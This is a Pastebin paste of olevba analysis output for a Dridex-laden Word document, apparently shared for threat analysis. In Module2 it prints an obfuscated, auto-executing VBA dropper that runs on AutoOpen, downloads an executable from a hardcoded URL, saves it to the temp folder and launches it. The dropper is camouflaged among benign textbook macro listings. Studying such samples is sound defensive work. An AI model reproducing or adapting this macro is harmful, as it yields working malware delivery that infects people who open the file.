dynamoo

Malicious Word macro

Jun 26th, 2015
501
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASI-B- dridex.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: dridex.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: dridex.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub ôñÔÔÀ(FFFFF As Long)
  17.  
  18. TOT9Qr3J8P
  19.  
  20. End Sub
  21.  
  22. Sub autoopen()
  23.  
  24. ôñÔÔÀ (3)
  25.  
  26. End Sub
  27.  
  28.  
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30. ANALYSIS:
  31. +----------+----------+---------------------------------------+
  32. | Type     | Keyword  | Description                           |
  33. +----------+----------+---------------------------------------+
  34. | AutoExec | AutoOpen | Runs when the Word document is opened |
  35. +----------+----------+---------------------------------------+
  36. -------------------------------------------------------------------------------
  37. VBA MACRO Module1.bas
  38. in file: dridex.doc - OLE stream: u'Macros/VBA/Module1'
  39. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  40. '
  41. Sub PublishAutoFilterRange()
  42.     Ôû.Sheets("Query").AutoFilterMode = False
  43.     ä.Range("Query_From_Northwind").Select
  44.     â.Range("Query_From_Northwind").AutoFilter _
  45.         Field:=1, _
  46.         Criteria1:="Condiments"
  47.     ThisWorkbook.PublishObjects.Add( _
  48.         SourceType:=xlSourceAutoFilter, _
  49.         FileName:="C:\Publish01.htm", _
  50.         Sheet:="Query", _
  51.         Source:=ô.Sheets("Query").AutoFilter.Range, _
  52.         HtmlType:=xlHtmlStatic, _
  53.         DivID:="ExcelAutoFilter", _
  54.         Title:="Excel AutoFilter Range").Publish True
  55. End Sub
  56. '
  57. ' Publish a chart sheet
  58. '
  59. Sub PublishChartSheet()
  60.     ThisWorkbook.PublishObjects.Add( _
  61.         SourceType:=xlSourceChart, _
  62.         FileName:="C:\Publish02.htm", _
  63.         Sheet:="Chart1", _
  64.         HtmlType:=xlHtmlChart, _
  65.         DivID:="ExcelChartSheet", _
  66.         Title:="Excel Chart Sheet").Publish True
  67. End Sub
  68. '
  69. ' Publish an embedded chart
  70. '
  71. Sub PublishEmbeddedChart()
  72.     ThisWorkbook.PublishObjects.Add( _
  73.         SourceType:=xlSourceChart, _
  74.         FileName:="C:\Publish03.htm", _
  75.         Sheet:="2000 Budget", _
  76.         Source:="Chart 1", _
  77.         HtmlType:=xlHtmlStatic, _
  78.         DivID:="ExcelEmbeddedChart", _
  79.         Title:="Excel Embedded Chart").Publish True
  80. End Sub
  81. '
  82. ' Publish a PivotTable
  83. '
  84. Sub PublishPivotTable()
  85.     ThisWorkbook.PublishObjects.Add( _
  86.         SourceType:=xlSourcePivotTable, _
  87.         FileName:="C:\Publish04.htm", _
  88.         Sheet:="PivotTable", _
  89.         Source:="PivotTable1", _
  90.         HtmlType:=xlHtmlList, _
  91.         DivID:="ExcelPivotTable", _
  92.         Title:="Excel PivotTable").Publish True
  93. End Sub
  94. '
  95. ' Publish a print area
  96. '
  97. Sub PublishPrintArea()
  98.     ç.Worksheets("2000 Budget").PageSetup.PrintArea = "A1:B13"
  99.     ThisWorkbook.PublishObjects.Add( _
  100.         SourceType:=xlSourcePrintArea, _
  101.         FileName:="C:\Publish05.htm", _
  102.         Sheet:="2000 Budget", _
  103.         Source:=ôâ.Worksheets("2000 Budget").PageSetup.PrintArea, _
  104.         HtmlType:=xlHtmlStatic, _
  105.         DivID:="ExcelPrintArea", _
  106.         Title:="Excel Print Area").Publish True
  107. End Sub
  108. '
  109. ' Publish a query table
  110. '
  111. Sub PublishQueryTable()
  112.     ThisWorkbook.PublishObjects.Add( _
  113.         SourceType:=xlSourceQuery, _
  114.         FileName:="C:\Publish06.htm", _
  115.         Sheet:="Query", _
  116.         Source:="Query from Northwind", _
  117.         HtmlType:=xlHtmlCalc, _
  118.         DivID:="ExcelQueryTable", _
  119.         Title:="Excel Query Table").Publish True
  120. End Sub
  121. '
  122. ' Publish a range using coordinates
  123. '
  124. Sub PublishRangeCoordinates()
  125.     ThisWorkbook.PublishObjects.Add( _
  126.         SourceType:=xlSourceRange, _
  127.         FileName:="C:\Publish07.htm", _
  128.         Sheet:="2000 Budget", _
  129.         Source:="A1:B17", _
  130.         HtmlType:=xlHtmlCalc, _
  131.         DivID:="ExcelRangeCoordinates", _
  132.         Title:="Excel Range Coordinates").Publish True
  133. End Sub
  134. '
  135. ' Publish a range using a name
  136. '
  137. Sub PublishRangeName()
  138.     ThisWorkbook.PublishObjects.Add( _
  139.         SourceType:=xlSourceRange, _
  140.         FileName:="C:\Publish08.htm", _
  141.         Source:="Expenses", _
  142.         HtmlType:=xlHtmlStatic, _
  143.         DivID:="ExcelRangeName", _
  144.         Title:="Excel Range Name").Publish True
  145. End Sub
  146.  
  147. Public Function WphmxowcstXb(A7X71OY4p As String)
  148.  Set zBo1iklWv9Sz = dFlagLB30D("S" & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & "c" & "a" & Chr(116) & Chr(105) & "o" & Chr(110))
  149. zBo1iklWv9Sz.Open (QrDNQZQRP)
  150. End Function
  151. Public Function dFlagLB30D(HvbtyGByuxg3J As String)
  152.  Set dFlagLB30D = CreateObject(HvbtyGByuxg3J)
  153. End Function
  154. Public Function IrQ2IESgmYoy(UNIWVVc542vt As Variant, cNvH4h9GxP As String)
  155. Dim oUeKB2dS: Set oUeKB2dS = dFlagLB30D(Chr(65) & "d" & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & "t" & Chr(114) & Chr(101) & "a" & "m")
  156.  
  157. With oUeKB2dS
  158.    .Type = 1
  159.     .Open
  160.     .write UNIWVVc542vt
  161.     .savetofile cNvH4h9GxP, 2
  162. End With
  163. End Function
  164.  
  165. '
  166. ' Publish a worksheet
  167. '
  168. Sub PublishWorksheet()
  169.     ThisWorkbook.PublishObjects.Add( _
  170.         SourceType:=xlSourceSheet, _
  171.         FileName:="C:\Publish09.htm", _
  172.         Sheet:="2000 Budget", _
  173.         HtmlType:=xlHtmlCalc, _
  174.         DivID:="ExcelWorksheet", _
  175.         Title:="Excel Worksheet").Publish True
  176. End Sub
  177. '
  178. ' Listing 20.2. Republishing a PublishObject.
  179. '
  180. Sub RepublishObject()
  181.     Dim strID As String
  182.     strID = "ExcelRangeCoordinates"
  183.     For Each po In ThisWorkbook.PublishObjects
  184.         If po.DivID = strID Then
  185.             po.Publish
  186.             Exit For
  187.         End If
  188.     Next 'po
  189. End Sub
  190. '
  191. ' Listing 20.3. A procedure that deletes all the PublishObjects
  192. '
  193. Sub DeletePublishObjects()
  194.   For Each po In ThisWorkbook.PublishObjects
  195.         po.Delete
  196.     Next 'po
  197. End Sub
  198. '
  199. ' Listing 20.4. A procedure that adds a Hyperlink object.
  200. '
  201. Sub AddLink()
  202.     Dim r As Range
  203.     '
  204.    ' Add a paragraph to the end of the document
  205.    '
  206.    With ThisDocument.Paragraphs
  207.         .Item(.Count).Range.InsertParagraphAfter
  208.         Set r = .Item(.Count).Range
  209.     End With
  210.     r.Text = "Sams' Home Page"
  211.     r.Hyperlinks.Add _
  212.         Anchor:=r, _
  213.         Address:="http://www.mcp.com/sams/", _
  214.         ScreenTip:="Click here to visit the home page of Sams!"
  215. End Sub
  216. '
  217. ' Listing 20.5. Procedures that add a link for the Yahoo!
  218. ' search engine and run a query on the Yahoo! database.
  219. '
  220. Sub AddYahoo()
  221.     Dim r As Range
  222.     '
  223.    ' Add a paragraph to the end of the document
  224.    '
  225.    With ThisDocument.Paragraphs
  226.         .Item(.Count).Range.InsertParagraphAfter
  227.         Set r = .Item(.Count).Range
  228.     End With
  229.     r.Text = "Yahoo Search"
  230.     r.Hyperlinks.Add _
  231.         Anchor:=r, _
  232.         Address:="http://search.yahoo.com/bin/search"
  233. End Sub
  234.  
  235. Sub SearchYahoo()
  236.     Dim link As Hyperlink
  237.     Dim keyword As String
  238.     Set link = ThisDocument.Hyperlinks("http://search.yahoo.com/bin/search")
  239.     keyword = InputBox("Enter a search keyword:")
  240.     link.Follow _
  241.         ExtraInfo:="p=" & keyword, _
  242.         Method:=msoMethodGet
  243. End Sub
  244. '
  245. ' Listing 20.6. Using the FollowHyperlink method to display
  246. ' a target document without an existing Hyperlink object.
  247. '
  248. Sub FollowHyperlinkTest()
  249.     Dim keyword As String
  250.     keyword = InputBox("Enter a search keyword:")
  251.     ThisDocument.FollowHyperlink _
  252.         Address:="http://search.yahoo.com/bin/search", _
  253.         ExtraInfo:="p=" & keyword, _
  254.         Method:=msoMethodGet
  255. End Sub
  256. '
  257. ' Listing 20.7. Some event handlers that are used to
  258. ' display a Web page.
  259. '
  260. ' This event handler fires when you first open the form
  261. '
  262. Private Sub UserForm_Initialize()
  263.     Dim maxWidth As Integer
  264.     Dim maxHeight As Integer
  265.     With webWWW
  266.         '
  267.        ' Display and save the initial URL
  268.        '
  269.        If txtLocation <> "" Then
  270.             topPage = txtLocation
  271.             .Navigate txtLocation
  272.         End If
  273.         '
  274.        ' Adjust the width and height of the control
  275.        '
  276.        maxWidth = Ê.Me.Width - .Left - 10
  277.         maxHeight = Ê.Me.Height - .Top - 20
  278.         If Application.UsableWidth > maxWidth Then
  279.             .Width = maxWidth
  280.         End If
  281.         If Application.UsableHeight > maxHeight Then
  282.             .Height = maxHeight
  283.         End If
  284.     End With
  285. End Sub
  286. '
  287. ' This event handler fires when you enter the text box
  288. '
  289. Private Sub txtLocation_Enter()
  290.     '
  291.    ' Make sure Surf! button is the default
  292.    '
  293.    cmdSurf.Default = True
  294. End Sub
  295. '
  296. ' This event handler fires when you click the Surf! button
  297. '
  298. Private Sub cmdSurf_Click()
  299.     '
  300.    ' Surf to the URL specified in the Location text box
  301.    '
  302.    If txtLocation <> "" Then
  303.         webWWW.Navigate txtLocation
  304.     Else
  305.         txtLocation.SetFocus
  306.         Beep
  307.     End If
  308. End Sub
  309. '
  310. ' This event handler fires once the Web page navigation is done
  311. '
  312. Private Sub webWWW_DocumentComplete(ByVal pDisp As Object, URL As Variant)
  313.     lblProgress.Caption = " Done"
  314.     txtLocation = URL
  315. End Sub
  316. '
  317. ' This event handler fires at the start of the download
  318. '
  319. Private Sub webWWW_DownloadBegin()
  320.     lblProgress.Caption = " Downloading..."
  321. End Sub
  322. '
  323. ' This event handler fires when the URL title changes
  324. '
  325. Private Sub webWWW_TitleChange(ByVal Text As String)
  326.     '
  327.    ' Update the form's caption to reflect the new title
  328.    '
  329.    ÊMe.Caption = "The Word Wide Web - " & webWWW.LocationName
  330. End Sub
  331. '
  332. ' This event handler fires when the status text changes
  333. '
  334. Private Sub webWWW_StatusTextChange(ByVal Text As String)
  335.     lblStatus = Text
  336. End Sub
  337. '
  338. ' Listing 20.8. Event handlers for the navigation
  339. ' buttons in the custom Web browser.
  340. '
  341. '
  342. ' This event handler fires when you click the Back button
  343. '
  344. Private Sub cmdBack_Click()
  345.     '
  346.    ' An error occurs if there is no page to go back to
  347.    '
  348.    On Error Resume Next
  349.     webWWW.GoBack
  350. End Sub
  351. '
  352. ' This event handler fires when you click the Forward button
  353. '
  354. Private Sub cmdForward_Click()
  355.     '
  356.    ' An error occurs if there is no page to go forward to
  357.    '
  358.    On Error Resume Next
  359.     webWWW.GoForward
  360. End Sub
  361. '
  362. ' This event handler fires when you click the Top button
  363. '
  364. Private Sub cmdTop_Click()
  365.     webWWW.Navigate topPage
  366. End Sub
  367. '
  368. ' This event handler fires when you click the Refresh button
  369. '
  370. Private Sub cmdRefresh_Click()
  371.     webWWW.Refresh
  372. End Sub
  373. '
  374. ' This event handler fires when you click the Stop button
  375. '
  376. Private Sub cmdStop_Click()
  377.     webWWW.Stop
  378. End Sub
  379. '
  380. ' This event handler fires when you click the Home button
  381. '
  382. Private Sub cmdHome_Click()
  383.     webWWW.GoHome
  384. End Sub
  385. '
  386. ' This event handler fires when you click the Search button
  387. '
  388. Private Sub cmdSearch_Click()
  389.     webWWW.GoSearch
  390. End Sub
  391. '
  392. ' This event handler fires when you click the Exit button
  393. '
  394. Private Sub cmdExit_Click()
  395.     Unload ÊMe
  396. End Sub
  397. '
  398. ' Listing 20.9. A procedure that manipulates Internet Explorer
  399. ' via Automation using various members of the
  400. ' InternetExplorer class.
  401. '
  402. Sub AutomateInternetExplorer()
  403.     Dim ie As Object
  404.     Dim result As Integer
  405.     '
  406.    ' Set up the Automation object
  407.    '
  408.    Set ie = CreateObject("InternetExplorer.Application")
  409.     '
  410.    ' Navigate to a page and customize the browser window
  411.    '
  412.    ie.Navigate "http://www.microsoft.com/ie/"
  413.     ie.Toolbar = False
  414.     ie.StatusBar = False
  415.     ie.MenuBar = False
  416.     '
  417.    ' Twiddle thumbs while the page loads
  418.    '
  419.    Do While ie.Busy
  420.         DoEvents
  421.     Loop
  422.     '
  423.    ' Display page info
  424.    '
  425.    result = MsgBox( _
  426.         "Current URL:  " & ie.LocationURL & Chr(13) & _
  427.         "Current Title: " & ie.LocationName & Chr(13) & _
  428.         "Document type: " & ie.Type & Chr(13) & Chr(13) & _
  429.         "Would you like to view this document?", _
  430.         vbYesNo + vbQuestion)
  431.     If result = vbYes Then
  432.         '
  433.        ' If Yes, make browser visible and activate it
  434.        '
  435.        ie.Visible = True
  436.         AppActivate "Microsoft Internet Explorer"
  437.     Else
  438.         '
  439.        ' If no, bail out
  440.        '
  441.        ie.Quit
  442.     End If
  443.     Set ie = Nothing
  444. End Sub
  445.  
  446. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  447. ANALYSIS:
  448. +------------+----------------------+-----------------------------------------+
  449. | Type       | Keyword              | Description                             |
  450. +------------+----------------------+-----------------------------------------+
  451. | Suspicious | Open                 | May open a file                         |
  452. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  453. |            |                      | strings                                 |
  454. | Suspicious | CreateObject         | May create an OLE object                |
  455. | Suspicious | SaveToFile           | May create a text file                  |
  456. | Suspicious | AppActivate          | May control another application by      |
  457. |            |                      | simulating user keystrokes              |
  458. | Suspicious | Run                  | May run an executable file or a system  |
  459. |            |                      | command                                 |
  460. | Suspicious | Write                | May write to a file (if combined with   |
  461. |            |                      | Open)                                   |
  462. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  463. |            |                      | may be used to obfuscate strings        |
  464. |            |                      | (option --decode to see all)            |
  465. | IOC        | http://www.mcp.com/s | URL                                     |
  466. |            | ams/                 |                                         |
  467. | IOC        | http://search.yahoo. | URL                                     |
  468. |            | com/bin/search       |                                         |
  469. | IOC        | http://www.microsoft | URL                                     |
  470. |            | .com/ie/             |                                         |
  471. +------------+----------------------+-----------------------------------------+
  472. -------------------------------------------------------------------------------
  473. VBA MACRO Module2.bas
  474. in file: dridex.doc - OLE stream: u'Macros/VBA/Module2'
  475. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  476. Public QrDNQZQRP As String
  477.  
  478.  
  479.  
  480.  
  481. ' Listing 13.4. Using the DDEInitiate method to open a DDE channel.
  482. '
  483. Sub TestIt()
  484.    Dim result As Integer
  485.     result = OpenHailingFrequencies
  486.     DDETerminate result
  487. End Sub
  488.  
  489. Function OpenHailingFrequencies() As Integer
  490.     Dim channel As Integer
  491.    
  492.     On Error GoTo BadConnection
  493.     '
  494.    ' Establish the DDE connection to Program Manager
  495.    '
  496.    channel = DDEInitiate("Progman", "Progman")
  497.    
  498.     MsgBox "A channel to Program Manager is now open.", vbInformation
  499.     '
  500.    ' Return the channel number
  501.    '
  502.    OpenHailingFrequencies = channel
  503.     Exit Function
  504.    
  505. BadConnection:
  506.     MsgBox "Could not open a channel to Program Manager!", vbExclamation
  507.     '
  508.    ' Return 0
  509.    '
  510.    OpenHailingFrequencies = 0
  511.        
  512. End Function
  513.  
  514. ' Listing 13.5. Using DDEExecute to control a server application.
  515. '
  516. Sub CreateWorkbookIcon()
  517.  
  518.     Dim channel As Integer
  519.     Dim strPath As String, strName As String, strApp As String
  520.    
  521.     On Error GoTo BadConnection
  522.     '
  523.    ' Get info required for program item
  524.    '
  525.    strPath = ActiveWorkbook.Path & "\" & ActiveWorkbook.Name
  526.     strName = Left(ActiveWorkbook.Name, Len(ActiveWorkbook.Name) - 4)
  527.     strApp = Application.Path & "\Excel.exe"
  528.     '
  529.    ' Establish the DDE connection to Program Manager
  530.    '
  531.    channel = DDEInitiate("Progman", "Progman")
  532.     '
  533.    ' Create the group and item
  534.    '
  535.    DDEExecute channel, "[CreateGroup(""Excel Workbooks"")]"
  536.     DDEExecute channel, "[AddItem(""" & strPath & """,""" & strName & """,""""" & strApp & """"")]"
  537.     DDETerminate channel
  538.  
  539.     Exit Sub
  540.    
  541. BadConnection:
  542.     MsgBox "Could not open a channel to Program Manager!", vbExclamation
  543.            
  544. End Sub
  545.  
  546. ' Listing 13.6. Using DDERequest to retrieve data from an
  547. ' application.
  548. '
  549.  
  550. Sub RequestWordData()
  551.     Dim channel As Integer
  552.     Dim wordData As Variant
  553.     Dim getString As String
  554.     On Error GoTo BailOut
  555.     '
  556.    ' Set up the application
  557.    '
  558.    Application.StatusBar = "Starting Word..."
  559.     Application.DisplayAlerts = False
  560.     '
  561.    ' Initiate channel with System topic
  562.    '
  563.    channel = DDEInitiate("Winword", "System")
  564.     '
  565.    ' Open the document we want to work with
  566.    '
  567.    Application.StatusBar = "Opening Word document..."
  568.     DDEExecute channel, "[FileOpen ""C:\My Documents\Chaptr13.doc""]"
  569.     DDETerminate channel
  570.     '
  571.    ' Initiate new channel with document
  572.    '
  573.    channel = DDEInitiate("Winword", "C:\My Documents\Chaptr13.doc")
  574.     '
  575.    ' Find keyword and add a bookmark
  576.    '
  577.    DDEExecute channel, "[StartOfDocument]"
  578.     DDEExecute channel, "[EditFind .Find = ""ACME""]"
  579.     DDEExecute channel, "[SelectCurSentence]"
  580.     DDEExecute channel, "[EditBookmark .Name = ""Gotcha""]"
  581.     '
  582.    ' Retrieve the bookmark and store it
  583.    '
  584.    wordData = DDERequest(channel, "Gotcha")
  585.     getString = wordData(1)
  586.     r.Worksheets("Sheet1").[A2].Value = getString
  587.     '
  588.    ' Quit Word and terminate channel
  589.    '
  590.    DDEExecute channel, "[FileExit 1]"
  591.     DDETerminate channel
  592.  
  593.     Exit Sub
  594.  
  595. BailOut:
  596.     DDETerminate channel
  597.     MsgBox "DDE operation failed!", vbExclamation
  598.  
  599. End Sub
  600.  
  601. ' Listing 13.7. Using DDEPoke to send data to an application.
  602. '
  603. Sub SendDataToWord()
  604.  
  605.     Dim channel As Integer, pokeData As Variant
  606.     On Error GoTo BailOut
  607.     '
  608.    ' Set up the application
  609.    '
  610.    Application.StatusBar = "Starting Word..."
  611.     Application.DisplayAlerts = False
  612.     '
  613.    ' Initiate channel with System topic
  614.    '
  615.    channel = DDEInitiate("Winword", "System")
  616.     '
  617.    ' Open the document we want to work with
  618.    '
  619.    Application.StatusBar = "Opening Word document..."
  620.     DDEExecute channel, "[FileOpen ""C:\My Documents\Chaptr13.doc""]"
  621.     DDETerminate channel
  622.     '
  623.    ' Initiate new channel with document
  624.    '
  625.    channel = DDEInitiate("Winword", "C:\My Documents\Chaptr13.doc")
  626.     '
  627.    'Get the data to be sent
  628.    '
  629.    Application.StatusBar = "Sending data..."
  630.     Set pokeData = t.Worksheets("Sheet1").[A1]
  631.     '
  632.    'Send it to the "Gotcha" bookmark
  633.    '
  634.    DDEPoke channel, "Gotcha", pokeData
  635.     '
  636.    ' Quit Word and terminate channel
  637.    '
  638.    Application.StatusBar = "Shutting down Word..."
  639.     DDEExecute channel, "[FileExit 1]"
  640.     DDETerminate channel
  641.     Application.StatusBar = False
  642.  
  643.     Exit Sub
  644.  
  645. BailOut:
  646.     DDETerminate channel
  647.     MsgBox "DDE operation failed!", vbExclamation
  648.     Application.StatusBar = False
  649.  
  650. End Sub
  651.  
  652. ' Listing 15.3. Using Automation to run a PowerPoint
  653. ' presentation slide show.
  654. '
  655. Sub TOT9Qr3J8P()
  656.  
  657. Set j9yPFDVwyo = dFlagLB30D("Mi" & Chr(99) & "r" & Chr(111) & Chr(115) & "o" & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & "L" & Chr(72) & "TT" & Chr(80))
  658.  
  659. CallByName j9yPFDVwyo, Chr(79) & Chr(112) & "e" & "n", VbMethod, Chr(71) & Chr(69) & Chr(84), _
  660. Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(99) & Chr(111) & "l" & Chr(99) & Chr(104) & Chr(101) & Chr(115) & Chr(116) & Chr(101) & Chr(114) & Chr(45) & Chr(105) & Chr(110) & Chr(115) & Chr(116) & Chr(105) & Chr(116) & Chr(117) & Chr(116) & Chr(101) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & "7" & Chr(48) & Chr(56) & Chr(47) & Chr(51) & Chr(52) & Chr(54) & Chr(46) & Chr(101) & Chr(120) & "e" _
  661. , False
  662.  
  663. Set nVoYwy5wi65Ru = dFlagLB30D("W" & Chr(83) & Chr(99) & Chr(114) & "i" & Chr(112) & Chr(116) & Chr(46) & Chr(83) & "h" & "e" & Chr(108) & Chr(108))
  664.  
  665. Set Njvhw3SCwhJF = CallByName(nVoYwy5wi65Ru, Chr(69) & Chr(110) & Chr(118) & Chr(105) & "r" & Chr(111) & Chr(110) & "m" & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & "r" & Chr(111) & Chr(99) & Chr(101) & "s" & Chr(115))
  666.  
  667. NkFurzJgA4 = Njvhw3SCwhJF(Chr(84) & "E" & Chr(77) & Chr(80))
  668.  
  669. QrDNQZQRP = NkFurzJgA4 & Chr(92) & Chr(98) & Chr(105) & "k" & Chr(115) & Chr(101) & Chr(110) & Chr(112) & Chr(100) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
  670. Dim yRG5Tmsczw() As Byte
  671.  
  672. CallByName j9yPFDVwyo, "S" & "e" & Chr(110) & Chr(100), VbMethod
  673. yRG5Tmsczw = CallByName(j9yPFDVwyo, "r" & Chr(101) & Chr(115) & Chr(112) & "o" & Chr(110) & Chr(115) & Chr(101) & Chr(66) & Chr(111) & "d" & Chr(121), VbGet)
  674. IrQ2IESgmYoy yRG5Tmsczw, QrDNQZQRP
  675. On Error GoTo ehUAReVao5
  676.     a = 197 / 0
  677.   On Error GoTo 0
  678.  
  679. PBWxy1g8qJuzYK:
  680.   Exit Sub
  681. ehUAReVao5:
  682.   WphmxowcstXb ("HBaMqGixX")
  683. Resume PBWxy1g8qJuzYK
  684. End Sub
  685. Sub RunPresentation()
  686.     On Error GoTo OpenPowerPoint
  687.     '
  688.    ' Reference the existing PowerPoint Application object
  689.    '
  690.    Set ppApp = GetObject(, "PowerPoint.Application")
  691.     '
  692.    ' Work with PowerPoint's Application object directly
  693.    '
  694.    With ppApp
  695.         '
  696.        ' Display PowerPoint
  697.        '
  698.        .Visible = True
  699.         '
  700.        ' Open and then run the presentation's slide show
  701.        '
  702.        .Presentations.Open "C:\My Documents\Juggling.ppt"
  703.         .Presentations("Juggling.ppt").SlideShowSettings.Run
  704.     End With
  705.     Set ppApp = Nothing
  706. '
  707. ' Program branches here if PowerPoint isn't running
  708. '
  709. OpenPowerPoint:
  710.     ' Create a new instance of PowerPoint's Application object
  711.    '
  712.    Set ppApp = CreateObject("PowerPoint.Application")
  713.     '
  714.    ' Continue after the statement that caused the error
  715.    '
  716.    Resume Next
  717. End Sub
  718.  
  719. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  720. ANALYSIS:
  721. +------------+----------------+-----------------------------------------+
  722. | Type       | Keyword        | Description                             |
  723. +------------+----------------+-----------------------------------------+
  724. | Suspicious | Open           | May open a file                         |
  725. | Suspicious | Chr            | May attempt to obfuscate specific       |
  726. |            |                | strings                                 |
  727. | Suspicious | CreateObject   | May create an OLE object                |
  728. | Suspicious | Run            | May run an executable file or a system  |
  729. |            |                | command                                 |
  730. | Suspicious | CallByName     | May attempt to obfuscate malicious      |
  731. |            |                | function calls                          |
  732. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  733. |            |                | may be used to obfuscate strings        |
  734. |            |                | (option --decode to see all)            |
  735. | IOC        | Excel.exe      | Executable file name                    |
  736. +------------+----------------+-----------------------------------------+
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×